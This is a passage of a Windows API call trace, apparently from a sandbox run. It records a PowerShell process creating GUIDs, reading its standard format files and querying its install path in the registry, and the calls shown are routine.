Data4=([0]=0x87, [1]=0xb3, [2]=0xbf, [3]=0x51, [4]=0xdf, [5]=0x6b, [6]=0x2b, [7]=0x9e))) returned 0x0 [0050.529] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x4e236034, Data2=0xa657, Data3=0x4de4, Data4=([0]=0x9f, [1]=0xa8, [2]=0x78, [3]=0xec, [4]=0xa, [5]=0x1e, [6]=0xd5, [7]=0x2b))) returned 0x0 [0050.530] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x349d20b8, Data2=0xddce, Data3=0x4806, Data4=([0]=0xa8, [1]=0xf2, [2]=0xcd, [3]=0xd2, [4]=0x86, [5]=0xba, [6]=0x4d, [7]=0x34))) returned 0x0 [0050.530] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328 [0050.530] GetLastError () returned 0x0 [0050.530] GetFileType (hFile=0x328) returned 0x1 [0050.530] SetErrorMode (uMode=0x1) returned 0x1 [0050.530] GetFileType (hFile=0x328) returned 0x1 [0050.530] ReadFile (in: hFile=0x328, lpBuffer=0x335d720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x335d720*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.532] GetLastError () returned 0x0 [0050.532] ReadFile (in: hFile=0x328, lpBuffer=0x335d720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x335d720*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.533] GetLastError () returned 0x0 [0050.533] ReadFile (in: hFile=0x328, lpBuffer=0x335d720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x335d720*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.533] GetLastError () returned 0x0 [0050.534] ReadFile (in: hFile=0x328, lpBuffer=0x335d720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x335d720*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.534] GetLastError () returned 0x0 [0050.534] ReadFile (in: hFile=0x328, lpBuffer=0x335d720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x335d720*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.534] GetLastError () returned 0x0 [0050.535] ReadFile (in: hFile=0x328, lpBuffer=0x335d720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x335d720*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.535] GetLastError () returned 0x0 [0050.535] ReadFile (in: hFile=0x328, lpBuffer=0x335d720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x335d720*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.535] GetLastError () returned 0x0 [0050.535] ReadFile (in: hFile=0x328, lpBuffer=0x335d720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x335d720*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.535] GetLastError () returned 0x0 [0050.535] ReadFile (in: hFile=0x328, lpBuffer=0x335d720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x335d720*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.535] GetLastError () returned 0x0 [0050.536] ReadFile (in: hFile=0x328, lpBuffer=0x335d720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x335d720*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.536] GetLastError () returned 0x0 [0050.536] ReadFile (in: hFile=0x328, lpBuffer=0x335d720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x335d720*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.536] GetLastError () returned 0x0 [0050.537] ReadFile (in: hFile=0x328, lpBuffer=0x335d720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x335d720*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.537] GetLastError () returned 0x0 [0050.537] ReadFile (in: hFile=0x328, lpBuffer=0x335d720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x335d720*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.537] GetLastError () returned 0x0 [0050.537] ReadFile (in: hFile=0x328, lpBuffer=0x335d720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x335d720*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.537] GetLastError () returned 0x0 [0050.537] ReadFile (in: hFile=0x328, lpBuffer=0x335d720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x335d720*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.537] GetLastError () returned 0x0 [0050.537] ReadFile (in: hFile=0x328, lpBuffer=0x335d720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x335d720*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.537] GetLastError () returned 0x0 [0050.538] ReadFile (in: hFile=0x328, lpBuffer=0x335d720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x335d720*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.538] GetLastError () returned 0x0 [0050.540] ReadFile (in: hFile=0x328, lpBuffer=0x335d720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x335d720*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.540] GetLastError () returned 0x0 [0050.540] ReadFile (in: hFile=0x328, lpBuffer=0x335d720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x335d720*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.540] GetLastError () returned 0x0 [0050.540] ReadFile (in: hFile=0x328, lpBuffer=0x335d720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x335d720*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.541] GetLastError () returned 0x0 [0050.541] ReadFile (in: hFile=0x328, lpBuffer=0x335d720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x335d720*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.541] GetLastError () returned 0x0 [0050.541] ReadFile (in: hFile=0x328, lpBuffer=0x335d720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x335d720*, lpNumberOfBytesRead=0x19e504*=0xe67, lpOverlapped=0x0) returned 1 [0050.541] GetLastError () returned 0x0 [0050.541] ReadFile (in: hFile=0x328, lpBuffer=0x335cd27, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x335cd27*, lpNumberOfBytesRead=0x19e504*=0x0, lpOverlapped=0x0) returned 1 [0050.541] GetLastError () returned 0x0 [0050.541] ReadFile (in: hFile=0x328, lpBuffer=0x335d720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x335d720*, lpNumberOfBytesRead=0x19e504*=0x0, lpOverlapped=0x0) returned 1 [0050.541] GetLastError () returned 0x0 [0050.542] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e488 | out: phkResult=0x19e488*=0x328) returned 0x0 [0050.542] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x19e4d0, lpData=0x0, lpcbData=0x19e4cc*=0x0 | out: lpType=0x19e4d0*=0x1, lpData=0x0, lpcbData=0x19e4cc*=0x56) returned 0x0 [0050.542] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x19e4d0, lpData=0x247300, lpcbData=0x19e4cc*=0x56 | out: lpType=0x19e4d0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x19e4cc*=0x56) returned 0x0 [0050.542] RegCloseKey (hKey=0x328) returned 0x0 [0050.545] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xd7ad7d85, Data2=0xb7d5, Data3=0x46ee, Data4=([0]=0x9f, [1]=0x7a, [2]=0xae, [3]=0xdc, [4]=0xca, [5]=0xe9, [6]=0x6c, [7]=0x4e))) returned 0x0 [0050.546] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x74470f5c, Data2=0xabd4, Data3=0x40ef, Data4=([0]=0xac, [1]=0x1a, [2]=0xcf, [3]=0x9c, [4]=0xb7, [5]=0xf8, [6]=0x4e, [7]=0xcd))) returned 0x0 [0050.546] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x3bfc9276, Data2=0x34a5, Data3=0x4420, Data4=([0]=0x85, [1]=0xc6, [2]=0xdb, [3]=0xaa, [4]=0x14, [5]=0xa6, [6]=0xc0, [7]=0xcf))) returned 0x0 [0050.546] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xc14c745b, Data2=0x7e4d, Data3=0x409a, Data4=([0]=0x99, [1]=0x3c, [2]=0xff, [3]=0xca, [4]=0xf0, [5]=0x52, [6]=0x72, [7]=0x5a))) returned 0x0 [0050.546] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x966a140c, Data2=0x9df2, Data3=0x4348, Data4=([0]=0x91, [1]=0x47, [2]=0x90, [3]=0xe0, [4]=0x9c, [5]=0xd7, [6]=0x6d, [7]=0x1a))) returned 0x0 [0050.546] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xb7900931, Data2=0x2994, Data3=0x4b52, Data4=([0]=0xba, [1]=0xe3, [2]=0x97, [3]=0x76, [4]=0xc, [5]=0x41, [6]=0x91, [7]=0x9a))) returned 0x0 [0050.546] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x816ed2d, Data2=0xf1c5, Data3=0x4c63, Data4=([0]=0x87, [1]=0x32, [2]=0x83, [3]=0xfa, [4]=0x64, [5]=0x1b, [6]=0x0, [7]=0x67))) returned 0x0 [0050.547] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x7b9213f8, Data2=0xb013, Data3=0x453f, Data4=([0]=0xa5, [1]=0xb1, [2]=0x3d, [3]=0x52, [4]=0x32, [5]=0x80, [6]=0xc3, [7]=0x9c))) returned 0x0 [0050.547] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x39fc3115, Data2=0xeb7d, Data3=0x42df, Data4=([0]=0xbc, [1]=0x65, [2]=0x97, [3]=0x6d, [4]=0xdf, [5]=0xe4, [6]=0xa2, [7]=0x11))) returned 0x0 [0050.547] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x7281d073, Data2=0x9a42, Data3=0x4798, Data4=([0]=0x8e, [1]=0x1b, [2]=0x19, [3]=0x53, [4]=0xd9, [5]=0x39, [6]=0x56, [7]=0xaf))) returned 0x0 [0050.547] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x7467c61b, Data2=0x45dc, Data3=0x453d, Data4=([0]=0x9e, [1]=0x20, [2]=0x12, [3]=0x77, [4]=0xf6, [5]=0xd7, [6]=0xf5, [7]=0xcf))) returned 0x0 [0050.547] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xb32a64da, Data2=0xff86, Data3=0x400c, Data4=([0]=0x88, [1]=0x69, [2]=0xbf, [3]=0x94, [4]=0x17, [5]=0xc3, [6]=0xbd, [7]=0x71))) returned 0x0 [0050.547] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x4675ad64, Data2=0x9996, Data3=0x4637, Data4=([0]=0x87, [1]=0x82, [2]=0xe5, [3]=0x8d, [4]=0x5e, [5]=0xbe, [6]=0x9f, [7]=0x9d))) returned 0x0 [0050.547] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x713e5599, Data2=0xb293, Data3=0x406c, Data4=([0]=0xb4, [1]=0xb7, [2]=0x5a, [3]=0x8a, [4]=0x39, [5]=0xa5, [6]=0x9d, [7]=0x13))) returned 0x0 [0050.547] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xda541531, Data2=0x94c4, Data3=0x4831, Data4=([0]=0x82, [1]=0x5e, [2]=0xa, [3]=0x4a, [4]=0x42, [5]=0xd1, [6]=0xaf, [7]=0x81))) returned 0x0 [0050.548] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x1f7d71d6, Data2=0x9324, Data3=0x4a41, Data4=([0]=0xaa, [1]=0x33, [2]=0xf8, [3]=0x10, [4]=0xeb, [5]=0xa1, [6]=0xd3, [7]=0x93))) returned 0x0 [0050.548] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xe596838e, Data2=0x6db6, Data3=0x455b, Data4=([0]=0xac, [1]=0x21, [2]=0x32, [3]=0xee, [4]=0x10, [5]=0x6f, [6]=0xd6, [7]=0xe3))) returned 0x0 [0050.548] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xda5d5e6c, Data2=0x4f54, Data3=0x4d66, Data4=([0]=0x85, [1]=0xb7, [2]=0xcc, [3]=0xc0, [4]=0x9f, [5]=0x9e, [6]=0xfd, [7]=0xeb))) returned 0x0 [0050.548] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xa487ec3c, Data2=0x5e44, Data3=0x4c47, Data4=([0]=0xac, [1]=0xc1, [2]=0xb, [3]=0x75, [4]=0xcd, [5]=0x48, [6]=0x9c, [7]=0x59))) returned 0x0 [0050.549] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x59e96303, Data2=0x4438, Data3=0x4e7f, Data4=([0]=0x98, [1]=0x43, [2]=0x15, [3]=0xb6, [4]=0x90, [5]=0x88, [6]=0x21, [7]=0xf))) returned 0x0 [0050.549] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x73d5649a, Data2=0x9e7e, Data3=0x42a3, Data4=([0]=0xba, [1]=0xe0, [2]=0xdc, [3]=0x2, [4]=0x73, [5]=0x3c, [6]=0x1b, [7]=0xc7))) returned 0x0 [0050.549] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xff46aaf6, Data2=0x38a0, Data3=0x4dff, Data4=([0]=0xa8, [1]=0x24, [2]=0x29, [3]=0xab, [4]=0x99, [5]=0xec, [6]=0xe6, [7]=0xd9))) returned 0x0 [0050.549] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x580a6006, Data2=0x15c3, Data3=0x474e, Data4=([0]=0x9e, [1]=0x29, [2]=0x88, [3]=0xa4, [4]=0xcb, [5]=0xac, [6]=0x99, [7]=0x32))) returned 0x0 [0050.549] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x4204a43a, Data2=0x845c, Data3=0x4077, Data4=([0]=0xa4, [1]=0x79, [2]=0xb2, [3]=0x2a, [4]=0x5f, [5]=0xbe, [6]=0x80, [7]=0x2f))) returned 0x0 [0050.549] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xd8ff7d1d, Data2=0xbb0f, Data3=0x444c, Data4=([0]=0x95, [1]=0xb9, [2]=0x7b, [3]=0x2d, [4]=0x38, [5]=0xe7, [6]=0x57, [7]=0x7))) returned 0x0 [0050.549] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xc0e781f, Data2=0x222f, Data3=0x4e4d, Data4=([0]=0xb5, [1]=0xf7, [2]=0x70, [3]=0x69, [4]=0xdc, [5]=0x49, [6]=0xc, [7]=0x87))) returned 0x0 [0050.550] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x7462b530, Data2=0xe262, Data3=0x4bdf, Data4=([0]=0xb5, [1]=0x4e, [2]=0x55, [3]=0xd4, [4]=0xf5, [5]=0x6b, [6]=0x7f, [7]=0x10))) returned 0x0 [0050.550] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xc9ece2ac, Data2=0x31a5, Data3=0x4c0a, Data4=([0]=0xbe, [1]=0xf5, [2]=0x58, [3]=0x8e, [4]=0x8c, [5]=0xbd, [6]=0xd8, [7]=0x5f))) returned 0x0 [0050.550] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x2e38c61f, Data2=0xdc0a, Data3=0x4391, Data4=([0]=0x90, [1]=0x18, [2]=0x2c, [3]=0xbe, [4]=0x9f, [5]=0x8a, [6]=0x1d, [7]=0x32))) returned 0x0 [0050.550] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x6d3ebba, Data2=0x68f9, Data3=0x4ee7, Data4=([0]=0xb5, [1]=0x60, [2]=0xb8, [3]=0x2, [4]=0xee, [5]=0x24, [6]=0x2a, [7]=0x24))) returned 0x0 [0050.550] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xd89e0d88, Data2=0x56d9, Data3=0x48fd, Data4=([0]=0x87, [1]=0x23, [2]=0xdd, [3]=0x43, [4]=0x79, [5]=0x79, [6]=0x9d, [7]=0x67))) returned 0x0 [0050.550] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x36bca17, Data2=0x344a, Data3=0x458f, Data4=([0]=0x84, [1]=0x50, [2]=0xc6, [3]=0x9, [4]=0xf2, [5]=0xbc, [6]=0xea, [7]=0xb8))) returned 0x0 [0050.550] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xe7ccec82, Data2=0x1f8b, Data3=0x4e80, Data4=([0]=0x86, [1]=0x3b, [2]=0xb4, [3]=0x82, [4]=0x64, [5]=0xf1, [6]=0xc3, [7]=0x58))) returned 0x0 [0050.553] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x96c58191, Data2=0x92a6, Data3=0x4403, Data4=([0]=0xba, [1]=0x6c, [2]=0xc0, [3]=0xd, [4]=0x17, [5]=0x26, [6]=0x3b, [7]=0x39))) returned 0x0 [0050.553] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xf5b84ceb, Data2=0x7b82, Data3=0x4488, Data4=([0]=0x97, [1]=0x27, [2]=0xb4, [3]=0x7b, [4]=0x6f, [5]=0xc8, [6]=0xf, [7]=0xc6))) returned 0x0 [0050.553] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x83b1be0f, Data2=0x1862, Data3=0x49c7, Data4=([0]=0xb8, [1]=0x9c, [2]=0x2f, [3]=0xa6, [4]=0xe, [5]=0x2d, [6]=0x51, [7]=0x89))) returned 0x0 [0050.553] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xb5fc6eb3, Data2=0x7320, Data3=0x42b7, Data4=([0]=0x90, [1]=0x48, [2]=0xa7, [3]=0x7, [4]=0x9a, [5]=0x6f, [6]=0x4e, [7]=0xd0))) returned 0x0 [0050.553] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xe6b1365e, Data2=0x66ee, Data3=0x4472, Data4=([0]=0x93, [1]=0x97, [2]=0xd8, [3]=0x66, [4]=0xe0, [5]=0x49, [6]=0x36, [7]=0xca))) returned 0x0 [0050.554] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xaf88b6ec, Data2=0x790c, Data3=0x489a, Data4=([0]=0x8a, [1]=0xac, [2]=0x86, [3]=0x54, [4]=0x9d, [5]=0x1b, [6]=0x3, [7]=0x42))) returned 0x0 [0050.554] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x162d28cc, Data2=0x1aee, Data3=0x4a79, Data4=([0]=0x87, [1]=0x9a, [2]=0xd1, [3]=0x9, [4]=0xd7, [5]=0xcb, [6]=0xa2, [7]=0x4a))) returned 0x0 [0050.554] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x58b0f51c, Data2=0x1546, Data3=0x46bf, Data4=([0]=0x84, [1]=0x87, [2]=0xf, [3]=0x55, [4]=0x2a, [5]=0x16, [6]=0x2, [7]=0x57))) returned 0x0 [0050.554] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x55aa1afd, Data2=0x6cd, Data3=0x406e, Data4=([0]=0xae, [1]=0x5c, [2]=0xbf, [3]=0x3, [4]=0x79, [5]=0x95, [6]=0xf7, [7]=0x5c))) returned 0x0 [0050.555] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x99947af4, Data2=0x217, Data3=0x4e5c, Data4=([0]=0x8c, [1]=0x35, [2]=0x0, [3]=0xfb, [4]=0xb3, [5]=0x36, [6]=0x18, [7]=0xc9))) returned 0x0 [0050.555] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x494d4d6, Data2=0xa72d, Data3=0x4946, Data4=([0]=0x90, [1]=0x6c, [2]=0x96, [3]=0x77, [4]=0x8c, [5]=0x87, [6]=0x7b, [7]=0x67))) returned 0x0 [0050.555] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x8a2723a7, Data2=0xa572, Data3=0x42a0, Data4=([0]=0x96, [1]=0x8b, [2]=0x9b, [3]=0x4a, [4]=0xf1, [5]=0xa6, [6]=0xf8, [7]=0x6))) returned 0x0 [0050.555] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xfa82793d, Data2=0x97ca, Data3=0x4d6e, Data4=([0]=0x99, [1]=0x75, [2]=0x8f, [3]=0xd7, [4]=0x50, [5]=0x66, [6]=0x3e, [7]=0xde))) returned 0x0 [0050.555] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x2dcdeb70, Data2=0xa65c, Data3=0x4760, Data4=([0]=0xb0, [1]=0xb7, [2]=0x9c, [3]=0x8e, [4]=0xc6, [5]=0x0, [6]=0xee, [7]=0x5))) returned 0x0 [0050.555] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xb82bcf2a, Data2=0xa2b7, Data3=0x43f2, Data4=([0]=0xb0, [1]=0xfb, [2]=0x2d, [3]=0xcf, [4]=0x83, [5]=0x0, [6]=0x1, [7]=0x2))) returned 0x0 [0050.556] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328 [0050.556] GetLastError () returned 0x0 [0050.556] GetFileType (hFile=0x328) returned 0x1 [0050.556] SetErrorMode (uMode=0x1) returned 0x1 [0050.556] GetFileType (hFile=0x328) returned 0x1 [0050.556] ReadFile (in: hFile=0x328, lpBuffer=0x344e0f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x344e0f8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.558] GetLastError () returned 0x0 [0050.559] ReadFile (in: hFile=0x328, lpBuffer=0x344e0f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x344e0f8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.559] GetLastError () returned 0x0 [0050.559] ReadFile (in: hFile=0x328, lpBuffer=0x344e0f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x344e0f8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.559] GetLastError () returned 0x0 [0050.559] ReadFile (in: hFile=0x328, lpBuffer=0x344e0f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x344e0f8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.559] GetLastError () returned 0x0 [0050.560] ReadFile (in: hFile=0x328, lpBuffer=0x344e0f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x344e0f8*, lpNumberOfBytesRead=0x19e504*=0x8b4, lpOverlapped=0x0) returned 1 [0050.560] GetLastError () returned 0x0 [0050.560] ReadFile (in: hFile=0x328, lpBuffer=0x344d54c, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x344d54c*, lpNumberOfBytesRead=0x19e504*=0x0, lpOverlapped=0x0) returned 1 [0050.560] GetLastError () returned 0x0 [0050.560] ReadFile (in: hFile=0x328, lpBuffer=0x344e0f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x344e0f8*, lpNumberOfBytesRead=0x19e504*=0x0, lpOverlapped=0x0) returned 1 [0050.560] GetLastError () returned 0x0 [0050.560] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e488 | out: phkResult=0x19e488*=0x328) returned 0x0 [0050.560] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x19e4d0, lpData=0x0, lpcbData=0x19e4cc*=0x0 | out: lpType=0x19e4d0*=0x1, lpData=0x0, lpcbData=0x19e4cc*=0x56) returned 0x0 [0050.561] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x19e4d0, lpData=0x247300, lpcbData=0x19e4cc*=0x56 | out: lpType=0x19e4d0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x19e4cc*=0x56) returned 0x0 [0050.561] RegCloseKey (hKey=0x328) returned 0x0 [0050.561] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x417093a3, Data2=0x378e, Data3=0x4d80, Data4=([0]=0x8e, [1]=0x20, [2]=0x1d, [3]=0x9f, [4]=0x9e, [5]=0xf6, [6]=0x0, [7]=0xac))) returned 0x0 [0050.562] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xf5fead7f, Data2=0x9c41, Data3=0x41eb, Data4=([0]=0xb1, [1]=0x3b, [2]=0x7c, [3]=0xe6, [4]=0xf8, [5]=0x9f, [6]=0xbb, [7]=0x7b))) returned 0x0 [0050.562] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, 